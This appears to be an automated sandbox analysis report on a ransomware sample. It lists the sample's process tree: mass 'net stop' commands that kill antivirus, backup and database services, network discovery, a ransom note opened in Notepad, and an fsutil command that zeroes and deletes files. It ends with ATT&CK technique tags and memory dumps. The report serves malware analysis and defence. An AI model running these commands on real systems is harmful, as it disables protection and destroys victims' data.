- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2012 /y
    3⤵
    PID:5680
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop swi_update_64 /y
    3⤵
    PID:5672
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:5664
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop swi_update /y
    3⤵
    PID:5656
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$TPSAMA /y
    3⤵
    PID:5648
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop swi_service /y
    3⤵
    PID:5640
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$TPS /y
    3⤵
    PID:5628
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop swi_filter /y
    3⤵
    PID:5620
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SYSTEM_BGC /y
    3⤵
    PID:5612
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop svcGenericHost /y
    3⤵
    PID:5604
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SQLEXPRESS /y
    3⤵
    PID:5596
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SOPHOS /y
    3⤵
    PID:5588
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SQL_2008 /y
    3⤵
    PID:5580
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sophossps /y
    3⤵
    PID:5572
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SHAREPOINT /y
    3⤵
    PID:5564
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SntpService /y
    3⤵
    PID:5556
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$SBSMONITORING /y
    3⤵
    PID:5548
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SmcService /y
    3⤵
    PID:5540
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$PROFXENGAGEMENT /y
    3⤵
    PID:5532
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop Smcinst /y
    3⤵
    PID:5524
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$PROD /y
    3⤵
    PID:5516
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ShMonitor /y
    3⤵
    PID:5508
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$PRACTTICEMGT /y
    3⤵
    PID:5500
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SepMasterService /y
    3⤵
    PID:5492
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$PRACTTICEBGC /y
    3⤵
    PID:5484
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SAVService /y
    3⤵
    PID:5476
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$ECWDB2 /y
    3⤵
    PID:5468
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SAVAdminService /y
    3⤵
    PID:5460
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$CXDB /y
    3⤵
    PID:5452
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sacsvr /y
    3⤵
    PID:5444
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$CITRIX_METAFRAME /y
    3⤵
    PID:5436
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SOPHOS /y
    3⤵
    PID:5428
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$BKUPEXEC /y
    3⤵
    PID:5420
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop sms_site_sql_backup /y
    3⤵
    PID:5412
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfevtp /y
    3⤵
    PID:5404
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop RESvc /y
    3⤵
    PID:5396
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:5388
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfemms /y
    3⤵
    PID:5380
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ReportServer$SQL_2008 /y
    3⤵
    PID:5372
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop wbengine /y
    3⤵
    PID:5364
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mfefire /y
    3⤵
    PID:5352
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop OracleClientCache80 /y
    3⤵
    PID:5344
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamTransportSvc /y
    3⤵
    PID:5336
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McTaskManager /y
    3⤵
    PID:5328
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MySQL80 /y
    3⤵
    PID:5320
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamRESTSvc /y
    3⤵
    PID:5312
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McShield /y
    3⤵
    PID:5304
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MySQL57 /y
    3⤵
    PID:5296
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamNFSSvc /y
    3⤵
    PID:5288
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeFrameworkMcAfeeFramework /y
    3⤵
    PID:5280
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLServerOLAPService /y
    3⤵
    PID:5272
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamMountSvc /y
    3⤵
    PID:5264
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeFramework /y
    3⤵
    PID:5256
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLServerADHelper100 /y
    3⤵
    PID:5248
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamHvIntegrationSvc /y
    3⤵
    PID:5240
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop McAfeeEngineService /y
    3⤵
    PID:5232
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLServerADHelper /y
    3⤵
    PID:5220
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamEnterpriseManagerSvc /y
    3⤵
    PID:5212
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MBEndpointAgent /y
    3⤵
    PID:5204
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLSERVER /y
    3⤵
    PID:5196
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamDeploySvc /y
    3⤵
    PID:5188
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MBAMService /y
    3⤵
    PID:5180
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$TPSAMA /y
    3⤵
    PID:5172
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamDeploymentService /y
    3⤵
    PID:5160
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop masvc /y
    3⤵
    PID:5152
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$TPS /y
    3⤵
    PID:5144
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamCloudSvc /y
    3⤵
    PID:5136
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop macmnsvc /y
    3⤵
    PID:5124
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$SYSTEM_BGC /y
    3⤵
    PID:4856
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamCatalogSvc /y
    3⤵
    PID:4988
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop klnagent /y
    3⤵
    PID:4936
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamBrokerSvc /y
    3⤵
    PID:2632
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop kavfsslp /y
    3⤵
    PID:4784
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$SHAREPOINT /y
    3⤵
    PID:4528
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop VeeamBackupSvc /y
    3⤵
    PID:4792
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop KAVFSGT /y
    3⤵
    PID:4624
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$SBSMONITORING /y
    3⤵
    PID:4668
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLWriter /y
    3⤵
    PID:4720
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop KAVFS /y
    3⤵
    PID:4576
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQLFDLauncher$PROFXENGAGEMENT /y
    3⤵
    PID:4600
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SQLAgent$VEEAMSQL2008R2 /y
    3⤵
    PID:4492
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop FA_Scheduler /y
    3⤵
    PID:4448
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2012 /y
    3⤵
    PID:4440
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SDRSVC /y
    3⤵
    PID:4344
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ESHASRV /y
    3⤵
    PID:4356
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$VEEAMSQL2008R2 /y
    3⤵
    PID:4212
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop MSSQL$SYSTEM_BGC /y
    3⤵
    PID:4276
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop mozyprobackup /y
    3⤵
    PID:4184
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop ekrn /y
    3⤵
    PID:5072
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop EhttpSrv /y
    3⤵
    PID:4892
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop QBFCService /y
    3⤵
    PID:4280
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop RTVscan /y
    3⤵
    PID:4244
- - C:\Windows\SysWOW64\net.exe
    "net.exe" stop SavRoam /y
    3⤵
    PID:4176
- - C:\Windows\SysWOW64\arp.exe
    "arp" -a
    3⤵
    PID:16552
- - C:\Windows\SysWOW64\net.exe
    "net.exe" use \\10.10.0.36
    3⤵
    PID:3180
- - C:\Windows\SysWOW64\notepad.exe
    "C:\Windows\System32\notepad.exe" C:\Users\Admin\Desktop\RESTORE_FILES_INFO.txt
    3⤵
    - Opens file in notepad (likely ransom note)
    PID:13156
- - C:\Windows\SysWOW64\cmd.exe
    "cmd.exe" /C ping 127.0.0.7 -n 3 > Nul & fsutil file setZeroData offset=0 length=524288 “%s” & Del /f /q “%s”
    3⤵
    PID:15488
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.7 -n 3
      4⤵
      Runs ping.exe
      PID:4852
  - - C:\Windows\SysWOW64\fsutil.exe
      fsutil file setZeroData offset=0 length=524288 “%s”
      4⤵
      PID:16164
- - C:\Windows\SysWOW64\cmd.exe
    "C:\Windows\System32\cmd.exe" "/C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Programs\Temp\tm94ra6g.exe
    3⤵
    PID:13084
  - - C:\Windows\SysWOW64\choice.exe
      choice /C Y /N /D Y /T 3
      4⤵
      PID:13620

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SavRoam /y
1⤵
PID:4704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RTVscan /y
1⤵
PID:4808

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s upnphost
1⤵
PID:7180

\??\c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localserviceandnoimpersonation -s FDResPub
1⤵
PID:7176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyServiceHelper /y
1⤵
PID:11008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamRESTSvc /y
1⤵
PID:10996

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$ECWDB2 /y
1⤵
PID:10664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop EhttpSrv /y
1⤵
PID:8156

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLBrowser /y
1⤵
PID:12960

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecRPCService /y
1⤵
PID:13768

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFS /y
1⤵
PID:13760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$PROFXENGAGEMENT /y
1⤵
PID:13752

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:13744

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop FA_Scheduler /y
1⤵
PID:13736

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2012 /y
1⤵
PID:13728

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SDRSVC /y
1⤵
PID:13720

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ESHASRV /y
1⤵
PID:13712

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$VEEAMSQL2008R2 /y
1⤵
PID:13704

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SYSTEM_BGC /y
1⤵
PID:13696

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ekrn /y
1⤵
PID:13688

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mozyprobackup /y
1⤵
PID:13680

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SYSTEM_BGC /y
1⤵
PID:13672

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCatalogSvc /y
1⤵
PID:13664

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop macmnsvc /y
1⤵
PID:13656

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploymentService /y
1⤵
PID:13648

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeEngineService /y
1⤵
PID:13640

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerOLAPService /y
1⤵
PID:13624

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFrameworkMcAfeeFramework /y
1⤵
PID:13616

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamMountSvc /y
1⤵
PID:13608

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPSAMA /y
1⤵
PID:13600

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McAfeeFramework /y
1⤵
PID:13592

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper100 /y
1⤵
PID:13584

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLSERVER /y
1⤵
PID:13576

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamEnterpriseManagerSvc /y
1⤵
PID:13568

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVAdminService /y
1⤵
PID:13560

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBEndpointAgent /y
1⤵
PID:13552

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$TPS /y
1⤵
PID:13424

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop klnagent /y
1⤵
PID:13412

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2012 /y
1⤵
PID:11096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLTELEMETRY /y
1⤵
PID:10968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQLEXPRESS /y
1⤵
PID:10888

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfemms /y
1⤵
PID:11892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sacsvr /y
1⤵
PID:6816

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SepMasterService /y
1⤵
PID:4376

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamTransportSvc /y
1⤵
PID:13304

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEMGT /y
1⤵
PID:13296

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PRACTTICEBGC /y
1⤵
PID:13288

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop Smcinst /y
1⤵
PID:13280

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SAVService /y
1⤵
PID:13272

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL80 /y
1⤵
PID:13256

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CXDB /y
1⤵
PID:13248

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLServerADHelper /y
1⤵
PID:13240

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLWriter /y
1⤵
PID:13232

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamDeploySvc /y
1⤵
PID:13224

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKeyScheduler /y
1⤵
PID:13216

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPS /y
1⤵
PID:13208

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TrueKey /y
1⤵
PID:13200

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSafeOLRService /y
1⤵
PID:13192

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROD /y
1⤵
PID:13184

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$TPSAMA /y
1⤵
PID:13176

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SOPHOS /y
1⤵
PID:13168

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SYSTEM_BGC /y
1⤵
PID:13160

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SQL_2008 /y
1⤵
PID:13152

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update_64 /y
1⤵
PID:13144

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ShMonitor /y
1⤵
PID:13136

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SHAREPOINT /y
1⤵
PID:13128

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop svcGenericHost /y
1⤵
PID:13120

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sophossps /y
1⤵
PID:13112

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$PROFXENGAGEMENT /y
1⤵
PID:13104

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$SBSMONITORING /y
1⤵
PID:13096

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SmcService /y
1⤵
PID:13088

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLSERVERAGENT /y
1⤵
PID:13080

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop TmCCSF /y
1⤵
PID:13072

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop tmlisten /y
1⤵
PID:13064

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_filter /y
1⤵
PID:13056

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SntpService /y
1⤵
PID:13048

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop sms_site_sql_backup /y
1⤵
PID:13040

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQL$SOPHOS /y
1⤵
PID:13032

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$CITRIX_METAFRAME /y
1⤵
PID:13024

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$BKUPEXEC /y
1⤵
PID:13016

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:13008

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfevtp /y
1⤵
PID:13000

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop mfefire /y
1⤵
PID:12992

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_update /y
1⤵
PID:12984

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop OracleClientCache80 /y
1⤵
PID:12976

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McTaskManager /y
1⤵
PID:12968

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop swi_service /y
1⤵
PID:12952

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop ReportServer$SQL_2008 /y
1⤵
PID:12944

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop RESvc /y
1⤵
PID:12936

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop BackupExecManagementService /y
1⤵
PID:12928

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcrSch2Svc /y
1⤵
PID:12920

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop AcronisAgent /y
1⤵
PID:12892

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop vapiendpoint /y
1⤵
PID:12872

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop WRSVC /y
1⤵
PID:12864

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop KAVFSGT /y
1⤵
PID:14244

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamCloudSvc /y
1⤵
PID:14236

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamHvIntegrationSvc /y
1⤵
PID:14228

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBackupSvc /y
1⤵
PID:14220

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop SQLAgent$VEEAMSQL2008R2 /y
1⤵
PID:14588

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop wbengine /y
1⤵
PID:14580

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop masvc /y
1⤵
PID:14436

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamNFSSvc /y
1⤵
PID:14420

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MySQL57 /y
1⤵
PID:14364

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop kavfsslp /y
1⤵
PID:14356

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop McShield /y
1⤵
PID:14348

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop VeeamBrokerSvc /y
1⤵
PID:2760

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MBAMService /y
1⤵
PID:14316

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SHAREPOINT /y
1⤵
PID:14308

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop MSSQLFDLauncher$SBSMONITORING /y
1⤵
PID:14300

C:\Windows\SysWOW64\net1.exe
C:\Windows\system32\net1 stop QBFCService /y
1⤵
PID:4848

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Modify Existing Service

T1031

Privilege Escalation

Defense Evasion

Disabling Security Tools

T1089

File and Directory Permissions Modification

T1222

Modify Registry

T1112

Credential Access

Discovery

Remote System Discovery

T1018

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

memory/2828-5-0x0000000072FA0000-0x000000007368E000-memory.dmp

Filesize
6.9MB

Download
memory/2828-6-0x0000000000360000-0x0000000000361000-memory.dmp

Filesize
4KB

Download
memory/2828-8-0x0000000004B80000-0x0000000004B81000-memory.dmp

Filesize
4KB

Download
memory/2828-9-0x0000000004B70000-0x0000000004B71000-memory.dmp

Filesize
4KB

Download
memory/3592-20-0x0000000007500000-0x0000000007501000-memory.dmp

Filesize
4KB

Download
memory/3592-21-0x0000000007D00000-0x0000000007D01000-memory.dmp

Filesize
4KB

Download
memory/3592-17-0x0000000007490000-0x0000000007491000-memory.dmp

Filesize
4KB

Download
memory/3592-33-0x0000000008D90000-0x0000000008D91000-memory.dmp

Filesize
4KB

Download
memory/3592-15-0x0000000000952000-0x0000000000953000-memory.dmp

Filesize
4KB

Download
memory/3592-34-0x0000000008F50000-0x0000000008F51000-memory.dmp

Filesize
4KB

Download
memory/3592-19-0x00000000075F0000-0x00000000075F1000-memory.dmp

Filesize
4KB

Download
memory/3592-31-0x0000000008A10000-0x0000000008A11000-memory.dmp

Filesize
4KB

Download
memory/3592-22-0x0000000007C70000-0x0000000007C71000-memory.dmp

Filesize
4KB

Download
memory/3592-14-0x0000000000950000-0x0000000000951000-memory.dmp

Filesize
4KB

Download
memory/3592-35-0x0000000000953000-0x0000000000954000-memory.dmp

Filesize
4KB

Download
memory/3592-16-0x0000000006BE0000-0x0000000006BE1000-memory.dmp

Filesize
4KB

Download
memory/3592-32-0x000000007E500000-0x000000007E501000-memory.dmp

Filesize
4KB

Download
memory/3592-36-0x0000000006810000-0x0000000006811000-memory.dmp

Filesize
4KB

Download
memory/3592-24-0x0000000008A40000-0x0000000008A73000-memory.dmp

Filesize
204KB

Download
memory/3592-13-0x0000000006C80000-0x0000000006C81000-memory.dmp

Filesize
4KB

Download
memory/3592-12-0x00000000041E0000-0x00000000041E1000-memory.dmp

Filesize
4KB

Download
memory/3592-38-0x0000000006800000-0x0000000006801000-memory.dmp

Filesize
4KB

Download
memory/3592-11-0x0000000072FA0000-0x000000007368E000-memory.dmp

Filesize
6.9MB

Download
memory/7068-109-0x0000000004B30000-0x0000000004B31000-memory.dmp

Filesize
4KB

Download
memory/7068-111-0x0000000004B32000-0x0000000004B33000-memory.dmp

Filesize
4KB

Download
memory/7068-105-0x0000000072FA0000-0x000000007368E000-memory.dmp

Filesize
6.9MB

Download
memory/7068-144-0x0000000004B33000-0x0000000004B34000-memory.dmp

Filesize
4KB

Download
memory/8932-123-0x0000000007EF0000-0x0000000007EF1000-memory.dmp

Filesize
4KB

Download
memory/8932-116-0x0000000007610000-0x0000000007611000-memory.dmp

Filesize
4KB

Download
memory/8932-137-0x0000000008E80000-0x0000000008E81000-memory.dmp

Filesize
4KB

Download
memory/8932-138-0x0000000008F60000-0x0000000008F61000-memory.dmp

Filesize
4KB

Download
memory/8932-140-0x0000000009610000-0x0000000009611000-memory.dmp

Filesize
4KB

Download
memory/8932-141-0x0000000008F90000-0x0000000008F91000-memory.dmp

Filesize
4KB

Download
memory/8932-143-0x0000000006603000-0x0000000006604000-memory.dmp

Filesize
4KB

Download
memory/8932-142-0x000000007F110000-0x000000007F111000-memory.dmp

Filesize
4KB

Download
memory/8932-112-0x0000000006602000-0x0000000006603000-memory.dmp

Filesize
4KB

Download
memory/8932-103-0x0000000072FA0000-0x000000007368E000-memory.dmp

Filesize
6.9MB

Download
memory/8932-107-0x0000000006600000-0x0000000006601000-memory.dmp

Filesize
4KB

Download